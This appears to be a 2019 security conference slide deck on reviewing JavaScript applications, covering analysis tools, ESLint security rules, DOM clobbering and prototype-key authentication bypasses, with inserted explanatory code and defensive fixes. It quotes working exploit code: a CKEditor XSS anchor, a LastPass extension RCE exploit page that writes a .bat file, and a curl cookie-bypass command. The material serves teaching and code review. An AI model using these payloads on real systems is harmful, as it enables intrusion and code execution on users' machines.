© 2019 Synopsys, Inc.
Reviewing Modern JavaScript Applications
Lewis Ardern, Senior Security Consultant, Synopsys Software Integrity Group
April 29, 2019
About me
Senior Security Consultant, Synopsys Software Integrity Group
– Consultant, formerly at Cigital
Prior to Cigital
• B.Sc. in computer security and ethical hacking
– Founder of the Leeds Ethical Hacking Society
• Software developer
• Security consultant
About Synopsys
• Historically all about hardware
• Software Integrity Group formed to tackle software
• Team consisting of well-known organizations
– Black Duck
– Coverity
– Codenomicon
– Cigital
– Codiscope
twitter.com/LewisArdern
Lewis Ardern
Senior Consultant
Software Integrity Group
SIG Consulting
JavaScript landscape
• Runs everywhere: browsers, servers, mobile, IoT devices
• Lots of frameworks, high levels of abstraction
• Move toward safe-by-default frameworks
Database
MongoDB
Server
Node.js/Express.js
Client
Angular
Life as we know it
“For the sixth year in a row, JavaScript is the most
commonly used programming language.”
—2018 Stack Overflow Developer Survey
https://insights.stackoverflow.com/survey/2016
Let’s not be REACTive!
• Frameworks can offer enormous security benefits
at the expense of outpacing existing security tools
• It is important to understand the specific security
characteristics and guarantees of any framework
you deploy
• Framework features can sometimes be abused
– http://blog.portswigger.net/2017/09/abusing-javascript-frameworks-to-bypass.html
• Teams transition / adopt different frameworks
in rapid succession
Modern JavaScript analysis
Security professionals need to embrace developer tools
to effectively identify security issues
• Live in the browser console
• Debug effectively
• Weaponize developer tools to identify security issues
• Commercial products (not covered today)
What today’s talk covers
Real-life examples from domain-specific experts
Recommended tools to use
Lesser-known JavaScript bugs
Example 1
• One of the _known_ edge cases with React is that it escapes text and attribute values but does not validate URL schemes, so an attacker-controlled `href` attribute such as `javascript:alert(0)` still yields cross-site scripting when the link is clicked
• In this HackerOne report, cross-site scripting on steamcommunity.com led to remote code execution, because the steam:// URI scheme hands the URL to the locally installed Steam client
https://hackerone.com/reports/409850
Video
@zemnmez cross-site scripting against https://steamcommunity.com
What did we see?
Using the Chrome Developer Console
• Beautifying the code
• Searching for functions
• Debugging client-side values
• Overriding values on the fly inside the console
• Backticks to bypass controls
Knowledge of React pitfalls
https://hackerone.com/reports/409850
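The React pitfall in Example 1 comes down to escaping not covering URL schemes, so the application itself has to decide which schemes an `href` may carry. The block below is an added example, not code from the talk, from the report or from React: it allow-lists schemes with the WHATWG `URL` parser that browsers and Node both expose. The base URL `https://example.com/` and the sample inputs are constructed for the demonstration.

```javascript
// Added example: scheme allow-listing for untrusted href values.
// Not code from the talk or from React; base URL and inputs are constructed.
// The WHATWG URL parser (global `URL` in browsers and Node) strips leading
// whitespace and embedded tab/newline characters and lower-cases the scheme,
// so tricks such as "java\tscript:" or " JaVaScRiPt:" normalise to "javascript:".

const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Returns the normalised absolute URL when its scheme is allow-listed,
// otherwise null (the caller then renders no href, or a neutral one).
function safeHref(input, base = 'https://example.com/') {
  if (typeof input !== 'string') return null; // objects with a clever toString are rejected too
  let url;
  try {
    url = new URL(input, base); // relative links resolve against the app's own origin
  } catch (err) {
    return null; // unparsable input is never rendered as a link
  }
  return SAFE_SCHEMES.has(url.protocol) ? url.href : null;
}

// Constructed inputs: what an attacker might submit as a "profile link".
const SAMPLES = [
  'https://example.com/profile',
  '/settings',
  'javascript:alert(0)',
  ' JaVaScRiPt:alert(0)',
  'java\tscript:alert(0)',
  'data:text/html,<script>alert(0)</script>',
  'steam://run/1', // custom schemes hand control to a desktop client; not allowed
  'vbscript:msgbox(0)',
];

// Maps every sample to the href that would actually be rendered.
function classify(samples = SAMPLES) {
  return samples.map((s) => ({ input: s, href: safeHref(s) }));
}

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.table(classify());
}
```

Note that this is a scheme check, not an origin check: a protocol-relative `//evil.example/x` resolves to `https://evil.example/x` and passes, which is the right answer for an "external link" field but not for a redirect target.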
Example 2
LiveOverflow’s pop-under RE
• Anti-debugging
• Various bypass techniques
• Deobfuscating JavaScript
• Debugging locally
• Using proxies
• Weird browser quirks
https://www.youtube.com/watch?v=8UqHCrGdxOM
Example 3
Gareth Heyes’ AngularJS research
• Deep understanding of JavaScript
• Auditing framework code
• DOM manipulation
• Inspecting objects && prototype
overriding
https://portswigger.net/blog/dom-based-angularjs-sandbox-escapes
https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
JavaScript analysis tools
Referencing only projects that either are open source or scan open source
Products that perform JavaScript dataflow analysis:
• Coverity Scan
• LGTM
Tools that look for areas of interest:
• Tarnish
• JSHint
• JSLint
• ESLint
– Code Climate—nodesecurity plugin
• TSLint
– tslint-angular-security
Tools that look for known issues in JavaScript libraries:
• Retire.js
• npm audit
• yarn audit
• GitHub
• Snyk
• auditjs
Tools that deobfuscate JavaScript:
• Closure Compiler
• JStillery
• unminify
Framework analysis browser extensions
React
https://chrome.google.com/webstore/detail/react-developer-tools/fmkadmapgofadopljbjfkapdkoienihi?hl=en
AngularJS
https://chrome.google.com/webstore/detail/angularjs-batarang/ighdmehidhipcmcojjgiloacoafjmpfk?hl=en
Angular
https://augury.rangle.io/
Vue
https://github.com/vuejs/vue-devtools
Just because “production mode is set” doesn’t mean they can’t be used for live apps
Known issues in JavaScript libraries
Always check for known security issues
• GitHub reports known-vulnerable dependencies automatically (security alerts)
• Depending on project type, use tools:
Project type            Command
npm                     npm audit
yarn                    yarn audit
bower                   auditjs --bower bower.json
Client-side JavaScript  retire --js /path/
Node.js open source     snyk test
ESLint
• ESLint is an open source pluggable linting utility for JavaScript
• Linters parse code into an AST and walk it to identify code quality and security issues
• ESLint was created to allow developers to enforce rules
• Can be hooked into the development release cycle
– Many teams do not allow code to be pushed with ESLint issues flagged
– You can create Git hooks
– Can be part of a CI/CD pipeline
• Allows custom rules to enforce domain-specific guidance
ESLint
ESLint is now the go-to tool for JavaScript developers
https://stateofjs.com/2017/other-tools/
ESLint security rules
ESLint can help security consultants look for points of interest
Default security rule configs
• Node.js https://github.com/nodesecurity/eslint-config-nodesecurity
• Vanilla JS https://github.com/mozfreddyb/eslint-config-scanjs
• AngularJS https://github.com/LewisArdern/eslint-plugin-angularjs-security-rules
• React https://github.com/yannickcr/eslint-plugin-react#list-of-supported-rules
Security rules
• eslint-plugin-scanjs
• eslint-plugin-security
• eslint-plugin-react
• eslint-plugin-angularjs-security
• eslint-plugin-no-wildcard-postmessage
• eslint-plugin-no-unsafe-innerhtml
• eslint-plugin-vue (vue/no-v-html rule)
• eslint-plugin-prototype-pollution-security-rules
JavaScript analysis tools for AngularJS
Problem: In AngularJS security assessments, I want to identify problem locations quickly
Solution: Create ESLint rules to run on every assessment as a starting point:
https://www.npmjs.com/package/eslint-plugin-angularjs-security-rules
Steps to create a rule
1. Create a test with cases the rule must flag (true positives) and cases it must leave alone (true negatives, so the rule does not produce false positives)
2. Walk the JavaScript AST and identify the node shape your requirement corresponds to
3. Create a rule from the AST output
4. Make sure the test passes
Creating a test
Identifying the requirements
Create the rule
Testing the rules
https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288
https://github.com/bkimminich/juice-shop
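The four steps above were shown on screenshots that did not survive extraction. The block below is an added example that walks them end to end; it is not code from eslint-plugin-angularjs-security-rules. The rule flags `$sce.trustAs*()` calls whose first argument is not a string literal (a constant cannot carry attacker data; anything else is a point of interest). To keep it runnable without ESLint installed, the valid and invalid cases are hand-built ESTree nodes rather than source strings, and a small walker stands in for ESLint's traversal; the rule object itself is in the shape ESLint loads.

```javascript
// Added example: a hand-written ESLint rule following the page's four steps,
// plus a minimal harness so it runs here without ESLint installed.
// Not code from eslint-plugin-angularjs-security-rules.

const SCE_TRUST_METHODS = new Set([
  'trustAs', 'trustAsHtml', 'trustAsJs', 'trustAsUrl', 'trustAsResourceUrl',
]);

// Step 2: the node shape we care about is CallExpression whose callee is
// the non-computed member expression $sce.<trustAs method>.
function isSceTrustCall(node) {
  const c = node.callee;
  return Boolean(c) && c.type === 'MemberExpression' && !c.computed &&
    c.object.type === 'Identifier' && c.object.name === '$sce' &&
    c.property.type === 'Identifier' && SCE_TRUST_METHODS.has(c.property.name);
}

function isStringLiteral(node) {
  return Boolean(node) && node.type === 'Literal' && typeof node.value === 'string';
}

// Step 3: the rule module. ESLint calls create(context) and invokes the
// returned visitor for every AST node of the listed type.
const noUnsafeSceTrust = {
  meta: {
    type: 'problem',
    docs: { description: 'disallow $sce.trustAs*() on non-constant input' },
    messages: { unsafeTrust: '$sce.{{method}}() on non-constant input bypasses AngularJS contextual escaping' },
    schema: [],
  },
  create(context) {
    return {
      CallExpression(node) {
        if (!isSceTrustCall(node)) return;
        if (isStringLiteral(node.arguments[0])) return; // constant markup: not a finding
        context.report({ node, messageId: 'unsafeTrust', data: { method: node.callee.property.name } });
      },
    };
  },
};

// Step 1: valid / invalid cases. ESLint's RuleTester takes source strings;
// here the ESTree nodes are built by hand so no parser is needed.
const id = (name) => ({ type: 'Identifier', name });
const lit = (value) => ({ type: 'Literal', value });
const call = (object, property, args) => ({
  type: 'CallExpression',
  callee: { type: 'MemberExpression', computed: false, object: id(object), property: id(property) },
  arguments: args,
});

const cases = {
  valid: [
    call('$sce', 'trustAsHtml', [lit('<b>static markup</b>')]), // constant: fine
    call('$sce', 'getTrustedHtml', [id('value')]),              // not a trustAs* method
    call('$http', 'get', [id('url')]),                          // unrelated call
  ],
  invalid: [
    call('$sce', 'trustAsHtml', [id('userComment')]),           // variable input
    call('$sce', 'trustAsResourceUrl', [call('angular', 'lowercase', [id('src')])]),
    call('$sce', 'trustAs', [id('type'), id('data')]),
  ],
};

// Stand-in for ESLint's traversal and context: applies the rule's visitor to
// every CallExpression in the tree and collects the reports.
function lintNode(rule, root) {
  const reports = [];
  const visitor = rule.create({ report: (r) => reports.push(r) });
  (function walk(node) {
    if (!node || typeof node !== 'object') return;
    if (node.type === 'CallExpression' && visitor.CallExpression) visitor.CallExpression(node);
    for (const key of Object.keys(node)) {
      const v = node[key];
      if (Array.isArray(v)) v.forEach(walk);
      else if (v && typeof v.type === 'string') walk(v);
    }
  })(root);
  return reports;
}

// Step 4: true only when every valid case is clean and every invalid case
// produces exactly one report.
function runCases(rule = noUnsafeSceTrust, suite = cases) {
  const validClean = suite.valid.every((n) => lintNode(rule, n).length === 0);
  const invalidFlagged = suite.invalid.every((n) => lintNode(rule, n).length === 1);
  return validClean && invalidFlagged;
}

if (typeof module !== 'undefined') module.exports = { noUnsafeSceTrust, lintNode, runCases, cases };
```

In a real plugin the same rule object is exported from `lib/rules/`, step 2 is done by pasting sample code into an AST viewer such as astexplorer.net with the espree parser, and step 4 uses `new RuleTester().run(name, rule, { valid: [...], invalid: [...] })` from the `eslint` package with source strings in place of the hand-built nodes.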
Lesser-known security issues
Let’s talk about lesser-known bugs!
DOM clobbering
The HTML spec's named property access lets markup define JavaScript values: an element's id (and, for some elements, its name) becomes a property of window and document, and a form's controls become properties of the form itself
http://jibbering.com/faq/names
http://thespanner.co.uk/2013/05/16/dom-clobbering
Attributes that define or override JavaScript values
• id on any element defines window.<id> (and document.<id> for some elements)
• name on form, img, iframe, embed and object defines window.<name>
• name on a form control (input, button, ...) defines <form>.<name>, shadowing built-in properties such as form.action
This can lead to:
• Cross-site scripting (XSS)
• Remote code execution (RCE) in browser extensions
DOM clobbering
<html>
<head>
</head>
<body>
<!-- id defines window.value; on a <form> the action attribute is reflected as .action.
     foooo is not a DOM property, so value.foooo stays undefined -->
<form id="value" foooo="value" action="exists"></form>
<!-- id defines window.valueExists on any element; name on a <div> defines nothing -->
<div id="valueExists" name="exists"></div>
<script>
if (value.action !== undefined) {
  alert('DOM clobbering')
}
if (value.foooo !== undefined) {
  // never reached: value does not exist
}
if (valueExists !== undefined) {
  alert('DOM clobbering')
}
if (valueExists.exists !== undefined) {
  // never reached: value does not exist
}
</script>
</body>
</html>
DOM clobbering
<html>
<body>
<form><input name="ownerDocument"></form>
<script>
console.log(document.forms[0].ownerDocument)
// Should return window.document
// Returns <input name="ownerDocument">
</script>
</body>
</html>
DOM clobbering
Exploit code from Mario Heiderich's talk https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34
// Exploit: an anchor whose id clobbers window._cke_htmlToLoad in the opener.
// document.write() stringifies the anchor, which yields its href, so the
// payload after the # is written into the preview window as HTML
<a href="plugins/preview/preview.html#<svg onload=alert(1)>" id="_cke_htmlToLoad"
target="_blank">Click me for dolphins!</a>
// Vulnerable code (preview window): trusts a property read from the opener
<script>
var doc = document;
doc.open();
doc.write(window.opener._cke_htmlToLoad);
doc.close();
delete window.opener._cke_htmlToLoad // no effect on an element-backed named property
</script>
Exploit that achieved cross-site scripting in CKEditor
https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34
Caveat when retesting: current WHATWG URL parsing percent-encodes < and > in the fragment, so this exact payload depends on the older browser behaviour of the time; the clobbering primitive itself is unchanged
Demo
DOM clobbering
DOM clobbering
Exploit that achieved remote code execution in the LastPass Chrome extension
https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6
function lp_url_is_lastpass(e) {
    if (null == e)
        return !1;
    var t = /^https:\/\/([a-z0-9-]+\.)?lastpass\.(eu|com)\//i
      , n = "https://lastpass.com/";
    // base_url is a bare global: an element with id="base_url" on the page
    // defines it, and indexOf() stringifies an <a> element to its href
    if ("undefined" != typeof base_url && (n = base_url),
    0 == e.indexOf(n) || 0 == e.indexOf("https://lastpass.com/") || 0 == e.indexOf("https://lastpass.eu/"))
        return !0;
    // only existence is tested, so any element with id="g_loosebasematching" enables the loose branch
    if ("undefined" != typeof g_loosebasematching) {
        var i = lp_gettld_url(e);
        return new RegExp(i + "/$").test(base_url)
    }
    return t.test(e)
}
...
// once the origin check passes, the lpwebsiteeventform controls
// (t.eventtype, t.eventdata1, ...) are forwarded to the background page
"openattach" == t.eventtype.value ? sendBG({
    cmd: "openattach",
    attachkey: t.eventdata1.value,
    data: t.eventdata2.value,
    mimetype: t.eventdata3.value
...
base_url can be set with:
x = document.createElement("a");
x.setAttribute("id", "base_url");
g_loosebasematching can be defined with:
<value id="g_loosebasematching" />
sendBG() is used to send remote procedure calls (RPC) to the extension, leading to RCE
DOM clobbering
<html>
<head>
<script>
function start() {
  // clobber base_url: an <a> element stringifies to its href, which resolves
  // against this (attacker) page's URL, so the prefix check passes
  x = document.createElement("a");
  x.setAttribute("id", "base_url");
  x.setAttribute("href", "//" + document.location.hostname);
  document.body.appendChild(x);
  exploit.submit();
}
</script>
</head>
<body onload="start()">
<!-- existence alone is enough: the check is typeof g_loosebasematching != "undefined" -->
<exploit id="g_loosebasematching" />
<!-- the form name the content script listens for; its controls become t.eventtype, t.eventdata1, ... -->
<form id="exploit" name="lpwebsiteeventform">
<input type="hidden" name="eventtype" value="openattach">
<input type="hidden" name="eventdata1" value="d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec">
<input type="hidden" name="eventdata2" value="!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==">
<input type="hidden" name="eventdata3" value="other:./../../../../../Desktop/exploit.bat">
</form>
</body>
</html>
Exploit that achieved remote code execution in LastPass Chrome extension
https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6
DOM clobbering
https://bugs.chromium.org/p/project-zero/issues/attachment?aid=277766&signed_aid=cHmKiER3b1GkZKd_e_0PAA==&inline=1
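The LastPass check above is the shape of bug a reviewer should recognise: an origin decision that reads its configuration from bare globals, in a context where the page author controls the DOM. The block below is an added example, not LastPass's code: it re-types the vulnerable function with the regex restored, next to a hardened version that keeps its configuration in a frozen module constant and decides on parsed scheme and hostname. Because there is no DOM in Node, the clobbered `<a id="base_url">` element is stood in for by a plain object whose `toString()` returns its href, which is exactly what `String.prototype.indexOf` sees in the real exploit; the URLs are constructed for the demonstration.

```javascript
// Added example (not LastPass's code): the slide's URL check next to a hardened
// version, with the DOM-clobbered base_url simulated by an object whose
// toString() returns an href, the way an <a> element stringifies.

// Vulnerable: base_url is a bare global. In a page the attacker controls,
// any element with id="base_url" defines it.
function lpUrlIsLastPassVulnerable(e) {
  if (e == null) return false;
  const t = /^https:\/\/([a-z0-9-]+\.)?lastpass\.(eu|com)\//i;
  let n = 'https://lastpass.com/';
  if (typeof base_url !== 'undefined') n = base_url; // DOM-clobberable
  if (e.indexOf(n) === 0 ||            // n is stringified: an <a> becomes its href
      e.indexOf('https://lastpass.com/') === 0 ||
      e.indexOf('https://lastpass.eu/') === 0) {
    return true;
  }
  // the same existence-only pattern applied to g_loosebasematching in the
  // original; that branch is omitted here
  return t.test(e);
}

// Hardened: configuration is a frozen module constant, the URL is parsed,
// and the decision is made on scheme + hostname, not on string prefixes.
const TRUSTED_HOSTS = Object.freeze(['lastpass.com', 'lastpass.eu']);

function lpUrlIsLastPassHardened(e) {
  if (typeof e !== 'string') return false;
  let url;
  try { url = new URL(e); } catch (err) { return false; }
  if (url.protocol !== 'https:') return false;
  const host = url.hostname.toLowerCase();
  return TRUSTED_HOSTS.some((h) => host === h || host.endsWith('.' + h));
}

// Simulates the exploit page: defines a global named base_url that behaves
// like <a id="base_url" href="https://attacker.example/">, runs fn, then
// removes the global so the simulation does not leak into later calls.
function withClobberedBaseUrl(href, fn) {
  globalThis.base_url = { toString: () => href }; // stand-in for the anchor element
  try { return fn(); } finally { delete globalThis.base_url; }
}

// Verdict of both checks for a candidate URL, before and after clobbering.
function compare(candidate, clobberHref = 'https://attacker.example/') {
  return {
    vulnerableClean: lpUrlIsLastPassVulnerable(candidate),
    vulnerableClobbered: withClobberedBaseUrl(clobberHref, () => lpUrlIsLastPassVulnerable(candidate)),
    hardenedClean: lpUrlIsLastPassHardened(candidate),
    hardenedClobbered: withClobberedBaseUrl(clobberHref, () => lpUrlIsLastPassHardened(candidate)),
  };
}

if (typeof module !== 'undefined') {
  module.exports = { lpUrlIsLastPassVulnerable, lpUrlIsLastPassHardened, withClobberedBaseUrl, compare };
}
```

The review heuristic this encodes: in content scripts and any page-injected code, `typeof someGlobal !== "undefined"` is a DOM clobbering sink, because the page can define that name with a single element. Read configuration from module scope, and compare origins with a parsed `URL`, never with `indexOf` on strings that may have come from the DOM.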
Insecure object comparisons
Similar to DOM clobbering, a lookup can succeed on a value the developer never put there. SESSIONS here is a plain object, so SESSIONS[token] also finds properties inherited from Object.prototype:
const SESSIONS = {}
const mustBeAuthenticated = (req, res, next) => {
  if(req.cookies) {
    const token = req.cookies.token
    if(token && SESSIONS[token]) { // truthy for token=constructor, hasOwnProperty, __proto__, ...
      //allow it
      return next()
    }
  }
  res.send('not authorized!')
}
Comparison table
Value                       Result of token && SESSIONS[token]
SESSIONS['invalidString']   False (undefined): rejected
SESSIONS['']                False ('' fails the token check): rejected
SESSIONS['constructor']     True (inherited Object function): accepted
SESSIONS['hasOwnProperty']  True (inherited function): accepted
What happens when you create an object in JavaScript?
const test = {}
// the new object inherits from Object.prototype, which the console shows as:
__proto__:
  constructor: ƒ Object()
  hasOwnProperty: ƒ hasOwnProperty()
  isPrototypeOf: ƒ isPrototypeOf()
  [...]
test['constructor'] === test.constructor // returns true
Exploit
• This issue is trivial to exploit
• Using curl, we can simply run the following command:
– curl https://localhost:9000 -H "Cookie: token=constructor"
• Alternatively, we can just set the document.cookie value via the browser
Demo
Insecure object comparisons
How do we correctly check?
Only accept keys the object itself owns:
SESSIONS.hasOwnProperty('__proto__')
// false
SESSIONS.hasOwnProperty('validString')
// true (once SESSIONS['validString'] has been set)
Or you can use a Map instead of an Object, which has no inherited keys:
SESSIONS.has('__proto__');
// false
SESSIONS.has('validString');
// true (once SESSIONS.set('validString', ...) has been called)
Note on authentication
• Use a well-tested library like Passport to do authentication
–http://www.passportjs.org/
• If rolling your own, compare secrets with crypto.timingSafeEqual(a, b)
–It compares two Buffers (or TypedArrays) of equal length in constant time, which prevents timing attacks
–It throws if the lengths differ, so hash or pad both inputs to a fixed length before calling it
–It does not fix the lookup above: prototype keys must still be excluded before any comparison
Other issues
Prototype pollution
• https://www.youtube.com/watch?v=LUsiFV3dsK8
• https://github.com/HoLyVieR/prototype-pollution-nsec18
• https://www.slideshare.net/LewisArdern/dangerous-design-patterns-in-one-line
• https://github.com/LewisArdern/eslint-plugin-prototype-pollution-security-rules
• https://gist.github.com/LewisArdern/db02e6c37b69c7cb4f1059dc9e536923
Mass assignment
• https://talks.amanvir.io/forward-js-san-francisco-security-issues-in-modern-javascript-Jan-2019.pdf
• https://www.owasp.org/index.php/Mass_Assignment_Cheat_Sheet
• https://www.npmjs.com/package/mongoose-mass-assign
Summary
• Adopt and embrace developer tools to identify security issues
• Conduct regular code reviews
• Measure and track your code quality and security
• Automate the process:
– ESLint for code linting and npm audit for dependencies
– Various static analysis tools for quality and security
– Break your CI build if any issues get flagged
Thank You
Questions?
Email: lewis@ardern.io
Website: https://ardern.io
Twitter: https://twitter.com/LewisArdern
GitHub: https://github.com/LewisArdern
LinkedIn: https://www.linkedin.com/in/lewis-ardern-83373a40

More Related Content

PDF
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
PDF
Hybrid Cloud Networking
PDF
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
PDF
Using CredHub for Kubernetes Deployments
PDF
DevSecOps: Key Controls for Modern Security Success
PDF
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
PPTX
(Isc)² secure johannesburg
PPTX
DevSecOps: Key Controls to Modern Security Success
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
Hybrid Cloud Networking
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Using CredHub for Kubernetes Deployments
DevSecOps: Key Controls for Modern Security Success
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
(Isc)² secure johannesburg
DevSecOps: Key Controls to Modern Security Success

What's hot (20)

PDF
OWASP SF - Reviewing Modern JavaScript Applications
PDF
OWASP Portland - OWASP Top 10 For JavaScript Developers
PPTX
How to get along with HATEOAS without letting the bad guys steal your lunch?
PDF
Cloud Native Java with Spring Cloud Services
PDF
Kubernetes for the Spring Developer
PDF
when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...
PPTX
Microservices and containers networking: Contiv, an industry leading open sou...
PDF
Serverless Security: A How-to Guide @ SnowFROC 2019
PPTX
Manual JavaScript Analysis Is A Bug
PDF
Elevate Your Application Security Program with Burp Suite and ThreadFix
PDF
Secure your Application with Google cloud armor
PDF
Getting Single Page Application Security Right
PDF
The DevSecOps Builder’s Guide to the CI/CD Pipeline
PDF
Demystifying AuthN/AuthZ Using OIDC & OAuth2
PPTX
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
PPTX
Mobile security part 2
PPTX
How to Secure Containerized Applications
PDF
The New Ways of DevSecOps - The Secure Dev 2019
PDF
Securing Container-Based Applications at the Speed of DevOps
PDF
Synopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CD
OWASP SF - Reviewing Modern JavaScript Applications
OWASP Portland - OWASP Top 10 For JavaScript Developers
How to get along with HATEOAS without letting the bad guys steal your lunch?
Cloud Native Java with Spring Cloud Services
Kubernetes for the Spring Developer
when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...
Microservices and containers networking: Contiv, an industry leading open sou...
Serverless Security: A How-to Guide @ SnowFROC 2019
Manual JavaScript Analysis Is A Bug
Elevate Your Application Security Program with Burp Suite and ThreadFix
Secure your Application with Google cloud armor
Getting Single Page Application Security Right
The DevSecOps Builder’s Guide to the CI/CD Pipeline
Demystifying AuthN/AuthZ Using OIDC & OAuth2
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 2
How to Secure Containerized Applications
The New Ways of DevSecOps - The Secure Dev 2019
Securing Container-Based Applications at the Speed of DevOps
Synopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CD
Ad

Similar to Webinar–Reviewing Modern JavaScript Applications (20)

PDF
BSides Leeds - Performing JavaScript Static Analysis
PPTX
How to React to JavaScript Insecurity
PDF
Webinar–OWASP Top 10 for JavaScript for Developers
PDF
The DOM is a Mess @ Yahoo
PPT
JavaScript Misunderstood
PPTX
Security testing of YUI powered applications
PPTX
Web security: Securing Untrusted Web Content in Browsers
PPTX
Security by the numbers
PDF
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
PPT
Reversing JavaScript
PPTX
Web security: Securing untrusted web content at browsers
PDF
A look at the prevalence of client-side JavaScript vulnerabilities in web app...
PDF
Web Development in Advanced Threat Prevention
PDF
Progressive web and the problem of JavaScript
PPTX
Pentesting Modern Web Apps: A Primer
PDF
Node Security: The Good, Bad & Ugly
PDF
Douglas - Real JavaScript
DOC
Same Origin Policy Weaknesses
PDF
Black Clouds and Silver Linings in Node.js Security - Liran Tal Snyk OWASP Gl...
PDF
Node.js security tour
BSides Leeds - Performing JavaScript Static Analysis
How to React to JavaScript Insecurity
Webinar–OWASP Top 10 for JavaScript for Developers
The DOM is a Mess @ Yahoo
JavaScript Misunderstood
Security testing of YUI powered applications
Web security: Securing Untrusted Web Content in Browsers
Security by the numbers
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Reversing JavaScript
Web security: Securing untrusted web content at browsers
A look at the prevalence of client-side JavaScript vulnerabilities in web app...
Web Development in Advanced Threat Prevention
Progressive web and the problem of JavaScript
Pentesting Modern Web Apps: A Primer
Node Security: The Good, Bad & Ugly
Douglas - Real JavaScript
Same Origin Policy Weaknesses
Black Clouds and Silver Linings in Node.js Security - Liran Tal Snyk OWASP Gl...
Node.js security tour
Ad

More from Synopsys Software Integrity Group (20)

PDF
Webinar–Segen oder Fluch?
PDF
Webinar–Mobile Application Hardening Protecting Business Critical Apps
PDF
Webinar–The 2019 Open Source Year in Review
PDF
Webinar–Best Practices for DevSecOps at Scale
PDF
Webinar–That is Not How This Works
PDF
Webinar–You've Got Your Open Source Audit Report–Now What?
PDF
Webinar–The State of Open Source in M&A Transactions
PDF
Webinar–5 ways to risk rank your vulnerabilities
PDF
Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...
PDF
Webinar–Using Evidence-Based Security
PDF
Webinar–Delivering a Next Generation Vulnerability Feed
PDF
Webinar–Financial Services Study Shows Why Investing in AppSec Matters
PDF
Webinar–What You Need To Know About Open Source Licensing
PDF
Webinar–Improving Fuzz Testing of Infotainment Systems and Telematics Units U...
PDF
Webinar–Why All Open Source Scans Aren't Created Equal
PDF
Webinar–Is Your Software Security Supply Chain a Security Blind Spot?
PDF
Webinar–Sécurité Applicative et DevSecOps dans un monde Agile
PDF
Webinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
PDF
Webinar – Streamling Your Tech Due Diligence Process for Software Assets
PDF
Webinar – Security Tool Misconfiguration and Abuse
Webinar–Segen oder Fluch?
Webinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–The 2019 Open Source Year in Review
Webinar–Best Practices for DevSecOps at Scale
Webinar–That is Not How This Works
Webinar–You've Got Your Open Source Audit Report–Now What?
Webinar–The State of Open Source in M&A Transactions
Webinar–5 ways to risk rank your vulnerabilities
Do Design Quality and Code Quality Matter in Merger and Acquisition Tech Due ...
Webinar–Using Evidence-Based Security
Webinar–Delivering a Next Generation Vulnerability Feed
Webinar–Financial Services Study Shows Why Investing in AppSec Matters
Webinar–What You Need To Know About Open Source Licensing
Webinar–Improving Fuzz Testing of Infotainment Systems and Telematics Units U...
Webinar–Why All Open Source Scans Aren't Created Equal
Webinar–Is Your Software Security Supply Chain a Security Blind Spot?
Webinar–Sécurité Applicative et DevSecOps dans un monde Agile
Webinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
Webinar – Streamling Your Tech Due Diligence Process for Software Assets
Webinar – Security Tool Misconfiguration and Abuse

Recently uploaded (20)

PDF
top salesforce developer skills in 2025.pdf
PPTX
Operating system designcfffgfgggggggvggggggggg
PDF
Navsoft: AI-Powered Business Solutions & Custom Software Development
PDF
medical staffing services at VALiNTRY
PDF
Internet Downloader Manager (IDM) Crack 6.42 Build 41
PPTX
Oracle E-Business Suite: A Comprehensive Guide for Modern Enterprises
PDF
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
PDF
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
PPTX
Odoo POS Development Services by CandidRoot Solutions
PPTX
L1 - Introduction to python Backend.pptx
PPTX
ManageIQ - Sprint 268 Review - Slide Deck
PDF
SAP S4 Hana Brochure 3 (PTS SYSTEMS AND SOLUTIONS)
PPTX
Agentic AI : A Practical Guide. Undersating, Implementing and Scaling Autono...
PDF
Which alternative to Crystal Reports is best for small or large businesses.pdf
PDF
2025 Textile ERP Trends: SAP, Odoo & Oracle
PDF
Upgrade and Innovation Strategies for SAP ERP Customers
PDF
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
PDF
T3DD25 TYPO3 Content Blocks - Deep Dive by André Kraus
PDF
How to Migrate SBCGlobal Email to Yahoo Easily
PPTX
Introduction to Artificial Intelligence
top salesforce developer skills in 2025.pdf
Operating system designcfffgfgggggggvggggggggg
Navsoft: AI-Powered Business Solutions & Custom Software Development
medical staffing services at VALiNTRY
Internet Downloader Manager (IDM) Crack 6.42 Build 41
Oracle E-Business Suite: A Comprehensive Guide for Modern Enterprises
Why TechBuilder is the Future of Pickup and Delivery App Development (1).pdf
Addressing The Cult of Project Management Tools-Why Disconnected Work is Hold...
Odoo POS Development Services by CandidRoot Solutions
L1 - Introduction to python Backend.pptx
ManageIQ - Sprint 268 Review - Slide Deck
SAP S4 Hana Brochure 3 (PTS SYSTEMS AND SOLUTIONS)
Agentic AI : A Practical Guide. Undersating, Implementing and Scaling Autono...
